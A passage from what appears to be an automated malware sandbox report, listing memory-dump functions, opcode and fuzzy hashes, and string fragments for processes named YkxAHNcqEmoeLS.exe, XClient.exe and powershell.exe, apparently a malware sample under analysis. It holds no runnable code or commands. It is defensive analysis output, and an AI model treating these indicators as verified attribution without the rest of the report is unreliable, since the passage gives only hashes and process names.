Opcode Fuzzy Hash: ed5395a959e71e99559a44b03792beb2c0791562c65afa29843148f7fa886e74
Instruction Fuzzy Hash: B921D371904204DFDB14DF28D584F26BB69FB88314F20C97DD94A4B296C33AD807CA62

Function 009CD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2178620812.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9cd000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ab26b40f8d7907f9d41b171f17199e49fcc0204fc96879a48b0e20e61f60622
Instruction ID: d63a47d18d52a71f538c65e0ac15bac4c54e0c9691a3e1c241cee1ad8a75f16d
Opcode Fuzzy Hash: 0ab26b40f8d7907f9d41b171f17199e49fcc0204fc96879a48b0e20e61f60622
Instruction Fuzzy Hash: C8210471904204EFDB05DF24D9C0F26BBA9FB88314F24C97DE9594B296C33AD806CB62

Function 009CD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2178620812.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9cd000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dc52b5a5c04ba4c84ff75de9bc55e698e0ecc7d293bfd7d2594d242add037be
Instruction ID: 14a953de07a138b2f7a922358491c28a9039f29354c69619faf2d4058e8f26cd
Opcode Fuzzy Hash: 3dc52b5a5c04ba4c84ff75de9bc55e698e0ecc7d293bfd7d2594d242add037be
Instruction Fuzzy Hash: 792150755093809FDB12CF24D994B15BF71EB46314F28C5EED8498B6A7C33A980ACB62

Function 009BD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2178538235.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9bd000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 8eee7bba2a2b453e639eff6a52bf490a129f9a7b6e03ca2d63053d4a9d6210c6
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 3F112672404240CFDB02CF00D6C4B56BF72FB94324F24C6A9D9090B266C33AE85ACBA2

Function 009BD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2178538235.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9bd000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 80ac86834e97dbfcf12b4ca6f81a92d8826b09b9ddfd70dca2cf10b5b7c5287b
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: BC112972404240CFCB12CF10D6C4B56BF71FB94324F24C5A9E8450B25AC336D456CBA1

Function 009CD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2178620812.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9cd000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 5173cae72fee6c5d1689385ad1618ebe3abb28ce17091782b0cc814363391f94
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: A4118B76904280DFDB16CF14D9C4B15BBA1FB84314F24C6AED8494B696C33AD84ACB62

Function 009BD759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2178538235.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9bd000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a79d09713ee4522047b466db9d3ef6987c3abaf81894d1e3871d56863d21cea
Instruction ID: b725bb0048f540b1c775d31dd8e34ae27e1f13a181dff577829845835c7b3a73
Opcode Fuzzy Hash: 3a79d09713ee4522047b466db9d3ef6987c3abaf81894d1e3871d56863d21cea
Instruction Fuzzy Hash: 0501A7B10063449AE7208A56CEC4BE6BFDCEF55330F18C86AED090A286D67D9840C6B1

Function 009BD758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2178538235.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9bd000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10b9a026597499a9760ff102161acc2b59659f6b2b1c566a2c769f1d8b1850c8
Instruction ID: f6cf47e724e40d22af99c12583f936884254ed02a1397a8adf524e8ff8c20895
Opcode Fuzzy Hash: 10b9a026597499a9760ff102161acc2b59659f6b2b1c566a2c769f1d8b1850c8
Instruction Fuzzy Hash: AFF062714053449EE7208A16DDC4BA6FFACEF55734F18C45AED484A286D2799844CAB1

Function 0A3C0E81 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2191127664.000000000A3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A3C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a3c0000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d76e5c5b4122a6e2888fc7405eeb0f2d73fd20a49bd302a5c2bd74d2d66f5fc4
Instruction ID: 0d5aae10a8b67670440421e0b47de6f8bb374addd355b45e8d441adb65bb7d2e
Opcode Fuzzy Hash: d76e5c5b4122a6e2888fc7405eeb0f2d73fd20a49bd302a5c2bd74d2d66f5fc4
Instruction Fuzzy Hash: CCE0923049A244EFC706DBB0AD045AD7FB8DB4B200F10499AE084DB121E6314F14CB62

Function 0A3C0E90 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2191127664.000000000A3C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A3C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a3c0000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c2e148bd1e1b04181a26fd699cacd4f45c781f06c0a776d03cfcdb313e97f8
Instruction ID: 052cc3d59a6b4e103c95ccbd64d05469486e4757f3c5ee870464a6b3ef171375
Opcode Fuzzy Hash: 14c2e148bd1e1b04181a26fd699cacd4f45c781f06c0a776d03cfcdb313e97f8
Instruction Fuzzy Hash: 7DE0C230495108EFCB04DBB4980859DBBFCDB0A300F0046A9A04997110EA314E10DBA1

Analysis Process: YkxAHNcqEmoeLS.exePID: 5852, Parent PID: 892COMMON

Executed Functions

Function 00D104E8 Relevance: 3.1, Strings: 2, Instructions: 573COMMON

Download Yara Rule

Strings

8aq, xrefs: 00D10925
JCuq, xrefs: 00D10851

Memory Dump Source

Source File: 0000000E.00000002.2500863403.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_d10000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID:
String ID: 8aq$JCuq
API String ID: 0-3475560027
Opcode ID: 7f5ec291bb2c2dd7adbf8d20f880440e825003dcb3c0dff0a162de50bf205e2d
Instruction ID: 1528832dd01a27b0805ae9fdf06443a6d5dabebbe1c3c85193f00cc2cfb9c1cc
Opcode Fuzzy Hash: 7f5ec291bb2c2dd7adbf8d20f880440e825003dcb3c0dff0a162de50bf205e2d
Instruction Fuzzy Hash: 215190347003119FC708AB78D958B6D7BEBFF84300B148469D80A873A6DE759C8AC792

Function 00D10848 Relevance: 2.7, Strings: 2, Instructions: 174COMMON

Download Yara Rule

Strings

8aq, xrefs: 00D10925
JCuq, xrefs: 00D10851

Memory Dump Source

Source File: 0000000E.00000002.2500863403.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_d10000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID:
String ID: 8aq$JCuq
API String ID: 0-3475560027
Opcode ID: 0efceeef2405d8abd55bb096887681204bf89640564ff0f79c4e632db817ca79
Instruction ID: d3187aaf86f05a5de6f0cc9e0cf56f04f876070ce5d430b02da5c7a558683704
Opcode Fuzzy Hash: 0efceeef2405d8abd55bb096887681204bf89640564ff0f79c4e632db817ca79
Instruction Fuzzy Hash: 9A5192347003159FC708AB78E958B6E7BEBEF84304B148869D40A873A6CE75DC86C791

Function 00D10AA9 Relevance: 2.6, Strings: 2, Instructions: 117COMMON

Download Yara Rule

Strings

dLcq, xrefs: 00D10AF3
Te]q, xrefs: 00D10ADD

Memory Dump Source

Source File: 0000000E.00000002.2500863403.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_d10000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID:
String ID: Te]q$dLcq
API String ID: 0-1133975778
Opcode ID: e29f3531f0cf4fe6be1974c43a8b0d9b110ec99e936fff3ae4bcc429eec5eef7
Instruction ID: 1325c5c5a70f25e6a6b570f785146a1fd8fd4c270d76fafb36e5d16081bb1e16
Opcode Fuzzy Hash: e29f3531f0cf4fe6be1974c43a8b0d9b110ec99e936fff3ae4bcc429eec5eef7
Instruction Fuzzy Hash: 68413934B002049FCB14EF69C598A9DBBF2FF49700F1484A9E506DB3A1CA71DC45CB51

Function 00D10C39 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2500863403.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_d10000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2843fb6d640b90741732ee2a86828933a58b834a7bcacbee5998b6910fc5def8
Instruction ID: a2fed4cf81dbdd1eb3b1d190366f520a5a808b57039fb866781926d524a6d76b
Opcode Fuzzy Hash: 2843fb6d640b90741732ee2a86828933a58b834a7bcacbee5998b6910fc5def8
Instruction Fuzzy Hash: 14211874A40108EFCB10EF58D589B9DBFF5EF48704F28815AE506DB2A2CBB19881CF90

Function 00D10A70 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2500863403.0000000000D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_d10000_YkxAHNcqEmoeLS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f1a9f27e574b7316c5b2cadcc38e5e8941be0e53d826e63b54bfd1fd6ebb659
Instruction ID: e9c586d915c5893e088da66703e8ad1495f066ee18897e0316a02a9df50aff27
Opcode Fuzzy Hash: 4f1a9f27e574b7316c5b2cadcc38e5e8941be0e53d826e63b54bfd1fd6ebb659
Instruction Fuzzy Hash: 32E0C2353001118FC708A77DF418C9E77EA9FC812531648BAE00ACB720CDA4CC024741

Analysis Process: XClient.exePID: 1412, Parent PID: 1028COMMON

Executed Functions

Function 00007FF848B10EE9 Relevance: .7, Instructions: 739COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2318135775.00007FF848B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848b10000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eac481d3fd4c1bf09c029e5cb35951c71cd96128e874be064266b841ff46157e
Instruction ID: 46649126a70fcaec37c46d59f6cdd8c4830cefa7e87d992c9e9e02a097d76eb3
Opcode Fuzzy Hash: eac481d3fd4c1bf09c029e5cb35951c71cd96128e874be064266b841ff46157e
Instruction Fuzzy Hash: 2032D330E2DA4A5FE798FB3894992B977D2FF987C0F440579D04EC7297DE28A8028741

Function 00007FF848B10C6E Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2318135775.00007FF848B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848b10000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fac490b15fee493468c203c22dfde051fc86a3e14c3f0b2062fa612366dcac9
Instruction ID: adbf4ba9071cba4bc6368dec681d992050a806209692abc3cde95d5f6bd0ec33
Opcode Fuzzy Hash: 9fac490b15fee493468c203c22dfde051fc86a3e14c3f0b2062fa612366dcac9
Instruction Fuzzy Hash: C2712321E0D94A4FE795BB7C98562F97BE2EF8A290F0401BAD44DC7197CE2868438381

Function 00007FF848B10B01 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2318135775.00007FF848B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848b10000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04837698a2b335cb5f077e89366fc28acb81337e7d2ac32efaaebe6e86ca3fa8
Instruction ID: 24faae6d81e9478f1f5ae27f3a743d2938af2df948ef6dabd9862c856ca12503
Opcode Fuzzy Hash: 04837698a2b335cb5f077e89366fc28acb81337e7d2ac32efaaebe6e86ca3fa8
Instruction Fuzzy Hash: A731F221F18D1A9FE744BBBC58493BDB7D2EF98795F14417AE00DC3283DE2899028782

Function 00007FF848B109BD Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2318135775.00007FF848B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848b10000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e05fbd9e0bf8cd88fd6471fc6b3cf91ab717c483f3c4dfe6ffb6fd899c2426a
Instruction ID: 63a101a6889978aa72715466e91b78e6768ee575a3445a310414706ac60fe9ac
Opcode Fuzzy Hash: 3e05fbd9e0bf8cd88fd6471fc6b3cf91ab717c483f3c4dfe6ffb6fd899c2426a
Instruction Fuzzy Hash: 5331AD30A19A1A9FEB45FB78C8656FDBBB1FF98340F510579D009D728ACE38A841CB40

Function 00007FF848B1180C Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2318135775.00007FF848B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848b10000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 817f476a6924317dce01755bde83a56afe93710a3d7e8e8a9dedb2c82a73419b
Instruction ID: 6258505079544573b56845a6df6b61e97116e62878a2e2547fe20d805b87438a
Opcode Fuzzy Hash: 817f476a6924317dce01755bde83a56afe93710a3d7e8e8a9dedb2c82a73419b
Instruction Fuzzy Hash: FA21AD30B1DA494FE788FB2C941A378B2C2EF98741F0445BEE00EC3297DE68AC418341

Function 00007FF848B11901 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2318135775.00007FF848B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848b10000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2fa8a6e5b29eec7beabf0afc2b271dd420d60b78037318f7964eb4d69a01d6d
Instruction ID: a6361c2757790b85ba31e4f956b4e5fe4ce33a6455963310c2b79dcc421938da
Opcode Fuzzy Hash: b2fa8a6e5b29eec7beabf0afc2b271dd420d60b78037318f7964eb4d69a01d6d
Instruction Fuzzy Hash: 4301261190C7C14FE746BB3C68185757FE0CFD62E4F0806EBE498CB5DBDA089A868346

Analysis Process: powershell.exePID: 7216, Parent PID: 2604COMMON

Executed Functions

Function 00007FF848BC6605 Relevance: 6.7, Strings: 5, Instructions: 423COMMON

Download Yara Rule

Strings

(BH, xrefs: 00007FF848BC678C
(BH, xrefs: 00007FF848BC6858
(BH, xrefs: 00007FF848BC67C3
(BH, xrefs: 00007FF848BC6974
(BH, xrefs: 00007FF848BC66ED

Memory Dump Source

Source File: 00000015.00000002.2463194279.00007FF848BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff848bc0000_powershell.jbxd

Similarity

API ID:
String ID: (BH$(BH$(BH$(BH$(BH
API String ID: 0-338949797
Opcode ID: 6e7f903517aadb17a40bff42080d40a9a4cead8c9286f7bfe033a43fc4d41756
Instruction ID: 080e0a0b02a5691dc9d6ec06a964a2ebe99291fe48899829ac77480158b85512
Opcode Fuzzy Hash: 6e7f903517aadb17a40bff42080d40a9a4cead8c9286f7bfe033a43fc4d41756
Instruction Fuzzy Hash: 31C15631E0EA8A5FEBA9AB2854599B57BE1EF17754F0409FFD00DC7483EA18AC068345

Function 00007FF848BC6651 Relevance: 5.3, Strings: 4, Instructions: 253COMMON

Download Yara Rule

Strings

(BH, xrefs: 00007FF848BC678C
(BH, xrefs: 00007FF848BC6858
(BH, xrefs: 00007FF848BC67C3
(BH, xrefs: 00007FF848BC66ED

Memory Dump Source

Source File: 00000015.00000002.2463194279.00007FF848BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff848bc0000_powershell.jbxd

Similarity

API ID:
String ID: (BH$(BH$(BH$(BH
API String ID: 0-2901158286
Opcode ID: ba03abf44f9aebd42139d174914ea7ec8525797a3db3d12bad11aa22141b5d6b
Instruction ID: ed685631dd1c1dbbea0d32fe2d002c682a019bdc87ab4e321529a9f34e25ec71
Opcode Fuzzy Hash: ba03abf44f9aebd42139d174914ea7ec8525797a3db3d12bad11aa22141b5d6b
Instruction Fuzzy Hash: 5B813671E0EAC65FEBA9EB2854599747AD1EF13B94F0809FEC40DCB5C3DA18AC058345

Function 00007FF848BC4073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

8>H, xrefs: 00007FF848BC413A

Memory Dump Source

Source File: 00000015.00000002.2463194279.00007FF848BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff848bc0000_powershell.jbxd

Similarity

API ID:
String ID: 8>H
API String ID: 0-780718992
Opcode ID: 3c7cdcc9a5d951fb36010fb09cf7419de36c68a78df1cb74653aea772217677c
Instruction ID: 14f38f8636428cf6fcf2fde20e11262341bcba68bebab96f53b5042c942096c9
Opcode Fuzzy Hash: 3c7cdcc9a5d951fb36010fb09cf7419de36c68a78df1cb74653aea772217677c
Instruction Fuzzy Hash: B6515532E0CA4A4FE799EA2C94116753BE2FFA4260F1805BEC04DC75ABDF24EC018345

Function 00007FF848BC40BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

8>H, xrefs: 00007FF848BC413A

Memory Dump Source

Source File: 00000015.00000002.2463194279.00007FF848BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff848bc0000_powershell.jbxd

Similarity

API ID:
String ID: 8>H
API String ID: 0-780718992
Opcode ID: e03bc76e9fa31e51ac5ade25f0055dc65c589ec315b6f40a7fe96400bee67189
Instruction ID: 4fac510025ec7c7859d5e5da47ef264cd204e581a338a8b06c70ade9d2617724
Opcode Fuzzy Hash: e03bc76e9fa31e51ac5ade25f0055dc65c589ec315b6f40a7fe96400bee67189
Instruction Fuzzy Hash: 2121F232D0DA474FE3A9EB1C94511752AD1FF642A0F5909BEC09DC79EACF28DD048249

Function 00007FF848AF9728 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2454066388.00007FF848AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff848af0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a5a3d43362728d8c81ab955622ddca26189f6a2d2a536f0e5a2f165af18da4a
Instruction ID: 544899362ede36ed4e03753309c1309fdb7462e61cdebe38451c00a09f96f078
Opcode Fuzzy Hash: 2a5a3d43362728d8c81ab955622ddca26189f6a2d2a536f0e5a2f165af18da4a
Instruction Fuzzy Hash: 3A412631D0DB888FEB19EF1CA80A2A87FE1FB54714F14416FD04883296DB75A8068BC2

Function 00007FF8489DE380 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2450125580.00007FF8489DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff8489dd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f704b951105e93d6e3913c2d20874104b54ffe688ec696bcb40698e5c7223311
Instruction ID: 046a4b618606346c9039fef67f247449bd9c7b72811bde4dafba88ff1a74a1d3
Opcode Fuzzy Hash: f704b951105e93d6e3913c2d20874104b54ffe688ec696bcb40698e5c7223311
Instruction Fuzzy Hash: 5641337180DFC44FE3569B2898499A23FF0EF52365F1501EFD088CB1A3D725A806CB96

Function 00007FF848AFA4AC Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2454066388.00007FF848AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff848af0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 432bbd477a15cdac8bc8f3bf968e0b5fe8781a5104db9ab0001886530d6718e0
Instruction ID: a7dba59f02113bfed9dd44d776f1272c8c7e6c0aa21d0577f0eebcdcf4b80718
Opcode Fuzzy Hash: 432bbd477a15cdac8bc8f3bf968e0b5fe8781a5104db9ab0001886530d6718e0
Instruction Fuzzy Hash: F621E63190CB4C4FDB59DB6C984A7E97BF0EB96321F04416FD448C3152DA74A456CB92

Function 00007FF848AF33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2454066388.00007FF848AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff848af0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: a7baea733327e0e0993f56b28b001eb7f7964720d8220c05d63b58cb0f731fc3
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 7E01677111CB0C4FDB44EF0CE451AA9B7E0FB95364F10056DE58AC3651DB36E882CB46

Function 00007FF848AF9CF8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2454066388.00007FF848AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff848af0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf1aedce09eccc1da4ee827fa0e887fa88dca388033ab37c31da18b7caf1236d
Instruction ID: d84c15c6d49dfb711463810cb91b90ea326748dcfec109d1d8181812c59c1be0
Opcode Fuzzy Hash: bf1aedce09eccc1da4ee827fa0e887fa88dca388033ab37c31da18b7caf1236d
Instruction Fuzzy Hash: 7CF0B43180C6C94FEB4BEF28885A5D57FA0EF16351F19029BE458C70A2DB659458CB92

Function 00007FF848BC4400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2463194279.00007FF848BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff848bc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d7aae2113d9c14788afc14774f199736758b04faa34edde95c66fbf140c079
Instruction ID: 4f854b6fa54c72b66f32f73e83ee91ee5ab86b6e621d9291d6d7993fe6a15dbf
Opcode Fuzzy Hash: 09d7aae2113d9c14788afc14774f199736758b04faa34edde95c66fbf140c079
Instruction Fuzzy Hash: F2F0E231A0D5458FD754EB0CE0408A877E0FF44720B2104BAE10DCB467CB26EC40C754

Non-executed Functions

Function 00007FF848AF8BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

M_^I, xrefs: 00007FF848AF8C72
M_^6, xrefs: 00007FF848AF8BFA
M_^<, xrefs: 00007FF848AF8C2A
M_^F, xrefs: 00007FF848AF8C6A
M_^J, xrefs: 00007FF848AF8C7A

Memory Dump Source

Source File: 00000015.00000002.2454066388.00007FF848AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff848af0000_powershell.jbxd

Similarity

API ID:
String ID: M_^6$M_^<$M_^F$M_^I$M_^J
API String ID: 0-1500707516
Opcode ID: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
Instruction ID: 7e97eaf439d42cef67cc7108c8043401db1fc37f0897274080ab0d6877bd54d6
Opcode Fuzzy Hash: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
Instruction Fuzzy Hash: 53214977309455AFD301BBBDB8085EC7390CB952BA38947B3E658CB543ED18A0C746C0

Function 00007FF848AF89FA Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

M_^, xrefs: 00007FF848AF8AC2
M_^, xrefs: 00007FF848AF8A7A
M_^, xrefs: 00007FF848AF89FA
M_^, xrefs: 00007FF848AF8A2A

Memory Dump Source

Source File: 00000015.00000002.2454066388.00007FF848AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff848af0000_powershell.jbxd

Similarity

API ID:
String ID: M_^$M_^$M_^$M_^
API String ID: 0-1397233021
Opcode ID: aeb95687310110ae44b3b5c4a5d80f3370ab49cc2212860e545a59081b754d7a
Instruction ID: e44431267ec81843bc2f0d4286643d43ba459e7bc3a74f0cf28a66bb1819efc5
Opcode Fuzzy Hash: aeb95687310110ae44b3b5c4a5d80f3370ab49cc2212860e545a59081b754d7a
Instruction Fuzzy Hash: 463196F3E0E5C28FE35AA6385C6A0957B90FF51658B4E02F5C5848F093FE591806C267

Analysis Process: XClient.exePID: 7424, Parent PID: 1028COMMON

Executed Functions

Function 00007FF848AF0EE9 Relevance: .7, Instructions: 739COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2415153239.00007FF848AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848af0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec55c84d8289c95c5138bd43f13ec3f76f17d8c3155ce13b135c6419ea17afdb
Instruction ID: 5fd3c2964b1a6f205a56ad6b6b0c0e0986020253b461359bee754cb88e603d8f
Opcode Fuzzy Hash: ec55c84d8289c95c5138bd43f13ec3f76f17d8c3155ce13b135c6419ea17afdb
Instruction Fuzzy Hash: 0832C220F2DA495FE799FB38849A2BD77D2FF88794F44057DD10EC3282DE28A8418742

Function 00007FF848AF0C6E Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2415153239.00007FF848AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ff848af0000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e249edce8be83883cd6cafbd8eb328de067350a9c48c3088945ec3e6da796a8
